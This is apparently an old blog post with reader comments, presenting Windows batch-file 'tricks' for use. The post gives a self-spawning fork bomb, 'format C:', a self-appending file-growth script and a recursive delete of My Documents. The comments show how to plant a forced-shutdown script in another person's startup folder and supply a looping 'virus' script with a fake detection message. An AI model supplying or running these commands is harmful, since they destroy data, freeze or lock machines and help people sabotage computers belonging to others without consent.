Here are alot of batch files and short cuts that are short and easy to use
what Batch files dos is that they are just commands that do awesome things
to use:
For the short ones use a short cut and change the icon and for the long one use the batch file (save in notepad and save as *.bat) but it really doesn’t matter for the short ones to be saved in bat files.
ok lets start with simple ones
to shutdown
Code:
shutdown -s -t 05 -c "type your message here"
to change the time out change the number to what ever number you like but if you want to shut it down as soon as you open it take the -t out and the number
to restart
its similar to the shutdown
Code:
shutdown -r -t 05 -c "type your message here"
[ad#ad-2]
heres another simple one that packs one almighty punch and freezes the computer
Code:
start name.bat
name.bat
then save it as the name.bat
when clicked it will freeze the comuter
this one wipes out your C: when unprotected
Code:
format C:
this one will get [b]really[b] big and slow your com a lot
Code:
name.bat>>name.bat
name.bat
i can’t be stuffed writing any thing any more so ill be brief
deletes my docs
Code:
rmdir C:\Documents and Settings \S\Q
Search Here
You might also like
|
|
|
|
|




{ 1 trackback }
{ 6 comments… read them below or add one }
is there anyway to make the shutdown one recurring like every time the computer starts?
For Technology advice , you should visit our new technology blog
http://www.ixibo.com/
July 19, 2008
is there anyway to make the shutdown one recurring like every time the computer starts?
Yes. There is a way. Its an easy way. Make a BAT file called (Anything)and put this code in it.
@ECHO OFF
shutdown -s -t 05 -c “This shutsdown your computer”
PAUSE
CLS
EXIT
Save that in the startup files. and about 1-5 mins there computer will shutdown. Have Fun.
ChatGhosty
Ps. Dont get in truble.
sent me mini virus and .bat files how to create
this is realy nice code so send me code to how to make small virus
@ immu. to make a batch file open up notepad. and type something like:
@echo off
shutdown -s -t 10 -c
pause
:loop
start “(whatever this filename is) .bat”
echo “Virus Detected: Terminating Windows”
goto loop
exit
then save your file as whatever you want (make sure its the same as what you put in the code) change the file format to “all file types” and put “.bat” at the end of it. once saved…you’ve made a batch file.